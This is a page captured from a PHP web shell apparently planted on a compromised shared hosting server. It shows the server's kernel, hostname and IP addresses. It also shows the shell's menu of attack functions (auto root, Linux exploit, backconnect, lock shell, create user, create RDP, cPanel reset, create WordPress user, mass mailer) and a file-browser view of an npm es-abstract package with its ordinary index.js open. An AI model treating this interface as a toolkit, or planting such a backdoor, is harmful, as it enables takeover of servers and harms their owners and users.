Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.189.184.250
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
node_modules /
npm /
node_modules /
es-abstract /
[ HOME SHELL ]
Name
Size
Permission
Action
helpers
[ DIR ]
drwxr-xr-x
operations
[ DIR ]
drwxr-xr-x
.editorconfig
276
B
-rw-r--r--
.jscs.json
3.91
KB
-rw-r--r--
.nycrc
234
B
-rw-r--r--
.travis.yml
6.8
KB
-rw-r--r--
CHANGELOG.md
6.43
KB
-rw-r--r--
GetIntrinsic.js
8.38
KB
-rw-r--r--
LICENSE
1.05
KB
-rw-r--r--
Makefile
3.75
KB
-rw-r--r--
README.md
1.8
KB
-rw-r--r--
es2015.js
21.28
KB
-rw-r--r--
es2016.js
454
B
-rw-r--r--
es2017.js
633
B
-rw-r--r--
es5.js
6.33
KB
-rw-r--r--
es6.js
53
B
-rw-r--r--
es7.js
53
B
-rw-r--r--
index.js
427
B
-rw-r--r--
package.json
2.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict'; var assign = require('./helpers/assign'); var ES5 = require('./es5'); var ES2015 = require('./es2015'); var ES2016 = require('./es2016'); var ES2017 = require('./es2017'); var ES = { ES5: ES5, ES6: ES2015, ES2015: ES2015, ES7: ES2016, ES2016: ES2016, ES2017: ES2017 }; assign(ES, ES5); delete ES.CheckObjectCoercible; // renamed in ES6 to RequireObjectCoercible assign(ES, ES2015); module.exports = ES;
Close